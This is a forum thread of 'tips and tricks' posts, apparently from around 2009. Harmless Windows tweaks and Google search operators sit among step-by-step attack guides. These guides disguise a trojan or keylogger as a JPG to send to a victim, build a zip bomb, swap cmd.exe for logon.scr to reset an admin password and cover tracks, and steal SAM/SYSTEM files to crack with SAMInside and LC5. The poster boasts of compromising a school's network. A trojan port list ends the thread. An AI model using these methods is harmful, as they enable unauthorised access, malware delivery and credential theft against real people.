Tips n tricks

nlasasatha

Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Try diz frndz.if any thing repost,ver sorry.

    -: Reveal *****(Asterisk) Passwords Using Javascript :-

    Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

    Follow the steps given below-

    1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

    2) Type your 'Username' and 'Password'.

    3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

    javascript: alert(document.getElementById('Passwd').value);


    4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


    Note :- This trick may not be working with firefox.

    Reveal Passwords Using Javascript
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    The ZIP of Death

    This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

    1) Make a.txt file

    2) Open and type the null character (alt + 255)

    3) Press ctrl + a then ctrl + v a couple times to make some null bytes

    4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

    5) Now make several copies of a.txt and name accordinly

    6) Open cmd.exe

    7) Type copy /b *.txt b.txt

    8) Now every copy is made into a super copy and repeat

    9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
    Because of the simple construction of the file, 1gb of null bytes.....!

    The zip is only 1 mb in size and can really annoy freinds.
    For added fun hex edit the zip and you will see a bunch of hex 5555

    Just add some more and the file will expand amazingly

    Make sure to not open this after

    You can always create your zip of death from the command line in linux
    dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Remove shortcut arrow from desktop icons completely

    To remove shortcut arrow from desktop icons in any type of document:

    a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.

    b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.

    c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.

    So, here is a summary of all actions:

    1. Start regedit.
    2. Navigate to HKEY_CLASSES_ROOT\lnkfile
    3. Delete the IsShortcut registry value.

    4. Navigate to HKEY_CLASSES_ROOT\piffile
    5. Delete the IsShortcut registry value.

    6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
    7. Delete the IsShortcut registry value.
    8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
    9. Delete the IsShortcut registry value.
    10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
    11. Delete the IsShortcut registry value.
    12. Navigate to HKEY_CLASSES_ROOT\WSHFile
    13. Delete the IsShortcut registry value.

    14. Close regedit.

    Logoff and… Enjoy!

    Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Hide EXE File into JPG

    This is a good trick to hide your exe files into a jpg file..!

    How about sending a trojan or a keylogger into your victim using this trick..??

    1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
    Basically what you need is to see hidden files and see the extension of all your files on your pc.

    2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

    3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

    4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

    5) Now create a shortcut of this 'picture.jpeg' in the same folder.

    6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

    7) Go to properties (on file me.jpeg) and now you need to do some changes there.

    8) First of all delete all the text on field 'Start In' and leave it empty.

    9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
    'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

    10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

    11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

    12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
    %SystemRoot%\system32\SHELL32.dll . Then press OK.

    13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

    14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

    15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
    This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

    16) So the best way to send these files together to someone is compress them into Zip or Rar.

    17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Be Very Careful with this..! ctr+c and ctr+v

    We all copy various data by using ctrl+c/Copy for pasting elsewhere.
    This copied data is stored on clipboard and is accessible over the net by a combination of Javascripts and ASP.

    Just try this:
    1) Copy any text by ctrl+c
    2) Click the Link: http://www.friendlycanadian.com/applications/clipboard.htm
    3) You will see the text you copied on the Screen which was
    accessed by this web page.

    Moral:
    Do not keep sensitive data (like passwords, creditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information. If sufficient data is stored by mistake it would give away confidential and important information without you knowing about it.

    To Avoid This
    To avoid this, follow these steps:

    1. Go to internet options->security

    2. Press custom level

    3. In the security settings, select disable under Allow paste operations via script.
    Now the contents of your clipboard are safe.

    Pass this information on to create an awareness of the same.

    Safe Browsing
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Renaming The Recycle Bin icon:

    To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor go to:

    HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
    and change the name “Recycle Bin” to whatever you want (don’t type any quotes).
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    How to remove recycle bin from your desktop Tip:

    Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
    Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
     
    • Like
    Reactions: kudos_utopia

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Win XP Tip, Hidden Back-up utility

    Insert your windows XP disc into your PC.

    Click exit if your installation screen comes up.

    Now go too your CD drive in *My Computer*. Right-click and select open.

    Choose VALUE ADD\MSFT\NT BACK-UP FILE.

    In the *files of type* drop down list be sure that *select all files* is on.

    Click on the NTBACK-UP.msi file and click okay.

    Click the finish button and now go over too the start button\ALL PROGRAMS\ACCESSORIES\SYSTEM TOOLS\ and there it is now.. BACK-UP FILES...

    Great little tool that Microsoft never should have hidden.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Fix Movie Inteferance in AVI files
    ==================================

    If you have any AVI files that you saved in Windows 9x, which have interference when opened in Windows XP, there is an easy fix to get rid of the interference:

    Open Windows Movie Maker.
    Click View and then click Options.
    Click in the box to remove the check mark beside Automatically create clips.

    Now, import the movie file that has interference and drag it onto the timeline. Then save the movie, and during the rerendering, the interference will be removed.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    A few things you might want to try with Google:

    Hand type the following prefixes and note their utility:

    link:url Shows other pages with links to that url.

    related:url same as "what's related" on serps.

    site:domain restricts search results to the given domain.

    allinurl: shows only pages with all terms in the url.

    inurl: like allinurl, but only for the next query word.

    allintitle: shows only results with terms in title.

    intitle: similar to allintitle, but only for the next word. "intitle:webmasterworld google" finds only pages with webmasterworld in the title, and google anywhere on the page.

    cache:url will show the Google version of the passed url.

    info:url will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.

    spell: will spell check your query and search for it.

    stocks: will lookup the search query in a stock index.

    filetype: will restrict searches to that filetype. "-filetype:doc" to remove Microsoft word files.

    daterange: is supported in Julian date format only. 2452384 is an example of a Julian date.

    maps: If you enter a street address, a link to Yahoo Maps and to MapBlast will be presented.

    phone: enter anything that looks like a phone number to have a name and address displayed. Same is true for something that looks like an address (include a name and zip code)

    site:www.somesite.net "+www.somesite.+net"
    (tells you how many pages of your site are indexed by google)

    allintext: searches only within text of pages, but not in the links or page title

    allinlinks: searches only within links, not text or title


    I hope there is something new in here for you and maybe this infos will be helpfull for ya.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Window's Tweak: Hack Your Start Button
    written by Sarah Lane on Wednesday, July 21, 2004


    I've gotten so many requests on how to change the Windows XP Start button, I'm going to teach you how to hack it to pieces manually.
    Before you get started, you might want to print out this page for easy reference.

    Change the Start text

    1. First of all, make sure you download Resource Hacker. You'll need this puppy to edit resources inside your Windows shell.

    2. Locate explorer.exe in your c:\Windows directory. Make a copy of the file in the same directory and rename it explorer.bak.

    3. Now launch Resource Hacker. In the File menu, open explorer.exe. You'll now see a bunch of collapsed folders.

    4. Expand the String Table folder and then find folder No. 37 (folder No. 38 if you're in Windows Classic mode).

    5. Click on resource 1033 and locate the text that says "Start." This is your Start button, and now you've got control over what it says! Change the "Start" text to your text of choice. You don't have a character limit, but the text takes up valuable taskbar space, so don't make it too long.

    6. Click on the button labeled Compile Script. This updates the settings for your Start button. But nothing will happen until you complete through step #20, so keep going!

    Change your hover text

    7. While you're here, why not also change the text that pops up when your mouse hovers over your Start button?

    8. Right now it says "Click here to begin." Well, duh! We already know that's where to begin!

    9. Open folder No. 34 and click on resource 1033.

    10. Find the text that says "Click here to begin" and change it to something cooler. Might I suggest "Click here for a good time, baby."

    11. Click on the Compile Script button to update this resource.

    Customize your Start icon

    12. For an added bonus, you can also change the Windows icon to the left of the text, too.

    13. Collapse the String Table folder and expand the Bitmap folder at the top of your folder list.

    14. Click on folder No. 143 and click on resource 1033. You should see that familiar Windows icon.

    15. Go to the Action Menu and select "Replace bitmap." Select "Open file with new bitmap", and locate the replacement image on your machine. Note: The image must have a .bmp extension and a size of 25 pixels by 20 pixels. Then click the Replace button.

    Here's the image I've been using instead of the Windows icon, in case you want to use it.



    16. Now that you've made your changes, save the file in your Windows folder with another name, such as newstartbutton.exe. Don't name it Explorer.exe, because that file is already being used by your system. Close all open programs and restart your system.

    17. Boot into Safe Mode With Command Prompt by pressing F8 on startup. Then choose Safe Mode in the command prompt.

    18. Log on as administrator and enter your password.

    19. When the command prompt comes up, make sure you're in the right directory by typing "cd c:\windows" (without the quotes).

    20. Now type "copy c:\windows\newstartbutton.exe c:\windows\explorer.exe" (no quotes). Type "yes" (no quotes) to overwrite the existing file, then restart your system by typing "shutdown -r" (no quotes).

    When Windows relaunches, you'll see your new Start button in all its glory!
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    How to hack Windows XP Admin Passwords
    ------------------------------------------------------------------------------
    This hack will only work if the person that owns the machine
    has no intelligence. This is how it works:
    When you or anyone installs Windows XP for the first time your
    asked to put in your username and up to five others.
    Now, unknownst to a lot of other people this is the only place in
    Windows XP that you can password the default Administrator Diagnostic
    Account. This means that to by pass most administrators accounts
    on Windows XP all you have to do is boot to safe mode by pressing F8
    during boot up and choosing it. Log into the Administrator Account
    and create your own or change the password on the current Account.
    This only works if the user on setup specified a password for the
    Administrator Account.

    This has worked for me on both Windows XP Home and Pro.
    -----------------------------------------------------------------------------
    Now this one seems to be machine dependant, it works randomly(don't know why)

    If you log into a limited account on your target machine and open up a dos prompt
    then enter this set of commands Exactly:
    (this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
    on the welcome screen of a normal booted machine)
    -----------------------------------------------------------------------------
    cd\ *drops to root
    cd\windows\system32 *directs to the system32 dir
    mkdir temphack *creates the folder temphack
    copy logon.scr temphack\logon.scr *backsup logon.scr
    copy cmd.exe temphack\cmd.exe *backsup cmd.exe
    del logon.scr *deletes original logon.scr
    rename cmd.exe logon.scr *renames cmd.exe to logon.scr
    exit *quits dos
    -----------------------------------------------------------------------------
    Now what you have just done is told the computer to backup the command program
    and the screen saver file, then edits the settings so when the machine boots the
    screen saver you will get an unprotected dos prompt with out logging into XP.
    Once this happens if you enter this command minus the quotes
    "net user <admin account name here> password"
    If the Administrator Account is called Frank and you want the password blah enter this
    "net user Frank blah"
    and this changes the password on franks machine to blah and your in.

    Have fun
    p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
    Any updates, Errors, Suggestions or just general comments mail them to either
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    HOW TO GET ANY WINDOWS PASSWORD

    ok..... here are the full details.....

    this works whether its windows 2000 or windows xp or windows xp SP1 or SP2 or windows server 2003....

    this works even if syskey encryption is employed...

    if it is FAT filesystem...

    just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

    if it is NTFS....

    u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

    use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

    AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

    I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.

    If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass.

    Programs needed: SAMInside (doesn't matter which version or if demo)
    LC4 or LC5 (lophtcrack)( must be full version)
    NTFSPro (doesn't matter if demo)
    any bootdisk maker

    Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.
     

    nlasasatha

    Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    TCP 1 Breach.2001, SocketsDeTroie.230, SocketsDeTroie.250
    TCP 28 Amanda.200
    TCP 31 MastersParadise.920
    TCP 68 Subseven.100
    TCP 142 NetTaxi.180
    TCP 146 Infector.141, Intruder.100, Intruder.100
    TCP 171 ATrojan.200
    TCP 285 WCTrojan.100
    TCP 286 WCTrojan.100
    TCP 334 Backage.310
    TCP 370 NeuroticKat.120, NeuroticKat.130
    TCP 413 Coma.109
    TCP 420 Breach.450
    TCP 555 Id2001.100, PhaseZero.100, StealthSpy.100
    TCP 623 Rtb666.160
    TCP 660 Zaratustra.100
    TCP 661 Noknok.800, Noknok.820
    TCP 666 BackConstruction.210, BackConstruction.250, Bla.100, Bla.200, Bla.400, Bla.503, Cain.150, Dimbus.100, Noknok.820, Ripper.100, SatansBackdoor.100, SatansBackdoor.101, SatansBackdoor.102, Unicorn.100, Unicorn.101, Unicorn.110
    TCP 667 SniperNet.210, Snipernet.220
    TCP 668 Unicorn.101, Unicorn.110
    TCP 680 Rtb666.160
    TCP 777 Tiny.100, Undetected.230, Undetected.300, Undetected.310, Undetected.320, Undetected.330, Undetected.331, Undetected.332
    TCP 785 NetworkTerrorist.100
    TCP 800 NeuroticKitten.010
    TCP 831 NeuroticKat.100, NeuroticKat.120, NeuroticKat.130
    TCP 901 NetDevil.130, NetDevil.140
    TCP 1000 DerSpaeher.200
    TCP 1001 Silencer.100
    TCP 1008 AutoSpy.100
    TCP 1010 DerSpaeher.200
    TCP 1015 Doly.150
    TCP 1111 TPort.100
    TCP 1130 Noknok.800, Noknok.820
    TCP 1207 SoftWAR.100
    TCP 1243 Subseven.100, SubSeven.110, SubSeven.180, SubSeven.190, Subseven.200
    TCP 1245 VoodooDoll.006
    TCP 1269 Matrix.130
    TCP 1480 RemoteHack.130
    TCP 1568 RemoteHack.100, RemoteHack.110
    TCP 1600 DirectConnection.100
    TCP 1601 DirectConnection.100
    TCP 1602 DirectConnection.100
    TCP 1634 NetCrack.100
    TCP 1784 Snid.120, Snid.212
    TCP 1999 TransmissionScout.100, TransmissionScout.110
    TCP 2000 ATrojan.200, InsaneNetwork.400
    TCP 2001 DIRT.220, TrojanCow.100
    TCP 2003 TransmissionScout.100, TransmissionScout.110
    TCP 2023 RipperPro.100
    TCP 2040 InfernoUploader.100
    TCP 2115 Bugs.100
    TCP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
    TCP 2332 SilentSpy.202
    TCP 2589 Dagger.140
    TCP 2600 DigitalRootbeer.100
    TCP 2989 Rat.200
    TCP 3128 MastersParadise.970
    TCP 3129 MastersParadise.920, MastersParadise.970
    TCP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
    TCP 3215 BlackStar.100, Ghost.230
    TCP 3333 Daodan.123
    TCP 3410 OptixPro.100, OptixPro.110
    TCP 3456 Force.155, TerrorTrojan.100
    TCP 3505 AutoSpy.130, AutoSpy.140
    TCP 3586 Snid.120, Snid.212
    TCP 3700 PortalOfDoom.100
    TCP 3723 Mantis.100
    TCP 3800 Eclypse.100
    TCP 3996 RemoteAnything.364
    TCP 4000 SkyDance.220, SkyDance.229
    TCP 4201 Wartrojan.160, Wartrojan.200
    TCP 4225 SilentSpy.202
    TCP 4321 Bobo.100
    TCP 4444 AlexTrojan.200, Crackdown.100
    TCP 4488 EventHorizon.100
    TCP 4523 Celine.100
    TCP 4545 InternalRevise.100, RemoteRevise.150
    TCP 4567 FileNail.100
    TCP 4666 Mneah.100
    TCP 4950 ICQTrojan.100
    TCP 5005 Aladino.060
    TCP 5025 Keylogger.WMRemote.100
    TCP 5031 NetMetro.104
    TCP 5032 NetMetro.104
    TCP 5033 NetMetro.104
    TCP 5050 RoxRat.100
    TCP 5151 OptixLite.020, OptixLite.030, OptixLite.040
    TCP 5190 MBomber.100
    TCP 5277 WinShell.400
    TCP 5343 WCRat.100
    TCP 5400 BackConstruction.120, BackConstruction.150, BladeRunner.080, DeepThroat.300
    TCP 5401 BackConstruction.120, BackConstruction.150, BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
    TCP 5402 BackConstruction.210, BackConstruction.250, BladeRunner.080, DeepThroat.300, Mneah.100
    TCP 5534 TheFlu.100
    TCP 5550 XTCP.200, XTCP.201
    TCP 5555 Noxcape.100, Noxcape.200
    TCP 5695 Assassin.100
    TCP 5714 WinCrash.100
    TCP 5741 WinCrash.100
    TCP 5742 WinCrash.103
    TCP 5802 Y3KRat.160
    TCP 5810 Y3KRat.160
    TCP 5838 Y3KRat.170
    TCP 5858 Y3KRat.110, Y3KRat.120, Y3KRat.140
    TCP 5880 Y3KRat.140
    TCP 5881 Y3KRat.110, Y3KRat.120, Y3KRat.140
    TCP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
    TCP 5883 Y3KRat.110, Y3KRat.140
    TCP 5884 Y3KRat.140, Y3KRat.150
    TCP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
    TCP 5886 Y3KRat.120, Y3KRat.140
    TCP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
    TCP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
    TCP 5889 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
    TCP 5890 Y3KRat.140
    TCP 6400 Thething.100, Thething.150
    TCP 6556 AutoSpy.120, AutoSpy.122
    TCP 6655 Aqua.020
    TCP 6660 LameSpy.095
    TCP 6666 LameRemote.100, ProjectMayhem.100
    TCP 6669 Vampire.100
    TCP 6670 DeepThroat.200, DeepThroat.210
    TCP 6671 DeepThroat.310
    TCP 6699 HostControl.101
    TCP 6711 DeepThroat.300, Noknok.820, SubSeven.180, SubSeven.190
    TCP 6712 Subseven.100
    TCP 6713 Subseven.100
    TCP 6767 NTRC.120
    TCP 6776 SubSeven.180, SubSeven.190, Subseven.200
    TCP 6789 Doly.200
    TCP 6796 SubSeven.214
    TCP 6912 ShitHeep.100
    TCP 6939 Indoctrination.100
    TCP 6953 Lithium.100
    TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
    TCP 6970 Danton.330
    TCP 7001 Freak88.100
    TCP 7119 Massaker.100
    TCP 7200 Massaker.110
    TCP 7300 Coced.221
    TCP 7301 Coced.221
    TCP 7306 NetSpy.200, NetSpy.200
    TCP 7410 Phoenix.190, Phoenix.200
    TCP 7511 Genue.100
    TCP 7609 Snid.120, Snid.212
    TCP 7614 Wollf.130
    TCP 7648 BlackStar.100, Ghost.230
    TCP 7788 Last.2000, Matrix.200
    TCP 7826 MiniOblivion.010, Oblivion.010
    TCP 7887 SmallFun.110
    TCP 7891 Revenger.100
    TCP 7979 VagrNocker.200
    TCP 7997 VagrNocker.200
    TCP 8000 XConsole.100
    TCP 8011 Way.240
    TCP 8012 Ptakks.215, Ptakks.217
    TCP 8110 LoseLove.100
    TCP 8111 LoseLove.100
    TCP 8301 LoseLove.100
    TCP 8302 LoseLove.100
    TCP 8372 NetBoy.100
    TCP 8720 Connection.130
    TCP 8734 AutoSpy.110
    TCP 8811 Force.155
    TCP 8899 Last.2000
    TCP 9000 Aristotles.100
    TCP 9301 LoseLove.100
    TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
    TCP 9401 InCommand.100, InCommand.110, InCommand.170
    TCP 9402 InCommand.100, InCommand.110
    TCP 9561 CRatPro.110
    TCP 9563 CRatPro.110
    TCP 9580 TheefLE.100
    TCP 9696 Danton.210, Ghost.230
    TCP 9697 Danton.320, Danton.330, Ghost.230
    TCP 9870 R3C.100
    TCP 9872 PortalOfDoom.100
    TCP 9873 PortalOfDoom.100
    TCP 9874 PortalOfDoom.100
    TCP 9875 PortalOfDoom.100
    TCP 9876 Rux.100, SheepGoat.100
    TCP 9877 SmallBigBrother.020
    TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
    TCP 9879 SmallBigBrother.020
    TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
    TCP 10001 DTr.130, DTr.140
    TCP 10013 Amanda.200
    TCP 10067 PortalOfDoom.100
    TCP 10100 Gift.240
    TCP 10101 NewSilencer.100
    TCP 10167 PortalOfDoom.100
    TCP 10528 HostControl.100, HostControl.260
    TCP 10607 Coma.109
    TCP 10666 Ambush.100
    TCP 11011 Amanda.200
    TCP 11050 HostControl.101
    TCP 11051 HostControl.100, HostControl.260
    TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
    TCP 11225 Cyn.100, Cyn.103, Cyn.120
    TCP 11306 Noknok.800, Noknok.820
    TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
    TCP 11991 PitfallSurprise.100
    TCP 12043 Frenzy.2000
    TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
    TCP 12346 Netbus.160, Netbus.170
    TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
    TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
    TCP 12389 KheSanh.210
    TCP 12478 Bionet.210
    TCP 12623 Buttman.090, Buttman.100
    TCP 12624 Buttman.090, Buttman.100
    TCP 12625 Buttman.100
    TCP 12904 Akropolis.100, Rocks.100
    TCP 13473 Chupacabra.100
    TCP 13753 AFTP.010
    TCP 14100 Eurosol.100
    TCP 14194 CyberSpy.840
    TCP 14286 HellDriver.100
    TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
    TCP 14501 PCInvader.060, PCInvader.070
    TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
    TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
    TCP 14504 PCInvader.050, PCInvader.060
    TCP 15092 HostControl.100, HostControl.260
    TCP 15382 SubZero.100
    TCP 15432 Cyn.210
    TCP 15555 ICMIBC.100
    TCP 16322 LastDoor.100
    TCP 16484 MoSucker.110
    TCP 16661 Dfch.010
    TCP 16969 Progenic.100
    TCP 16982 AcidShiver.100
    TCP 17300 Kuang.200
    TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
    TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
    TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
    TCP 17593 AudioDoor.120
    TCP 19191 BlueFire.035, BlueFire.041
    TCP 19604 Metal.270
    TCP 19605 Metal.270
    TCP 19991 Dfch.010
    TCP 20000 Millenium.100
    TCP 20001 Millenium.100, PshychoFiles.180
    TCP 20002 AcidKor.100, PshychoFiles.180
    TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
    TCP 21212 Schwindler.182
    TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
    TCP 21579 Breach.2001
    TCP 21584 Breach.2001
    TCP 21684 Intruse.134
    TCP 22068 AcidShiver.110
    TCP 22115 Cyn.120
    TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
    TCP 22223 Rux.400, Rux.500, Rux.600
    TCP 22456 Bla.200, Bla.503
    TCP 22457 AcidShiver.120, Bla.200, Bla.503
    TCP 22784 Intruzzo.110
    TCP 22845 Breach.450
    TCP 22847 Breach.450
    TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
    TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
    TCP 23032 Amanda.200
    TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
    TCP 23456 EvilFTP.100, VagrNocker.400
    TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
    TCP 23477 DonaldDick.153
    TCP 24000 Infector.170
    TCP 24307 Wildek.020
    TCP 25386 MoonPie.220
    TCP 25486 MoonPie.220
    TCP 25555 FreddyK.100, FreddyK.200
    TCP 25556 FreddyK.100
    TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
    TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
    TCP 25982 MoonPie.135, MoonPie.200
    TCP 26274 Delta.050
    TCP 27160 MoonPie.135, MoonPie.200
    TCP 27184 Alvgus.100, Alvgus.800
    TCP 27374 Muerte.110, Subseven.210, SubSeven.213
    TCP 28429 Hack'a'Tack.2000
    TCP 28430 Hack'a'Tack.2000
    TCP 28431 Hack'a'Tack.2000
    TCP 28432 Hack'a'Tack.2000
    TCP 28433 Hack'a'Tack.2000
    TCP 28434 Hack'a'Tack.2000
    TCP 28435 Hack'a'Tack.2000
    TCP 28436 Hack'a'Tack.2000
    TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
    TCP 29891 Unexplained.100
    TCP 30000 Infector.170
    TCP 30001 Error32.100
    TCP 30003 LamersDeath.100
    TCP 30029 AOLTrojan.110
    TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
    TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
    TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
    TCP 30103 NetSphere.131
    TCP 30947 Intruse.134
    TCP 31320 LittleWitch.400, LittleWitch.420
    TCP 31337 BackOrifice.120, Khaled.100, OPC.200
    TCP 31415 Lithium.101
    TCP 31416 Lithium.100, Lithium.101
    TCP 31557 Xanadu.110
    TCP 31631 CleptoManicos.100
    TCP 31745 Buschtrommel.100, Buschtrommel.122
    TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
    TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
    TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
    TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
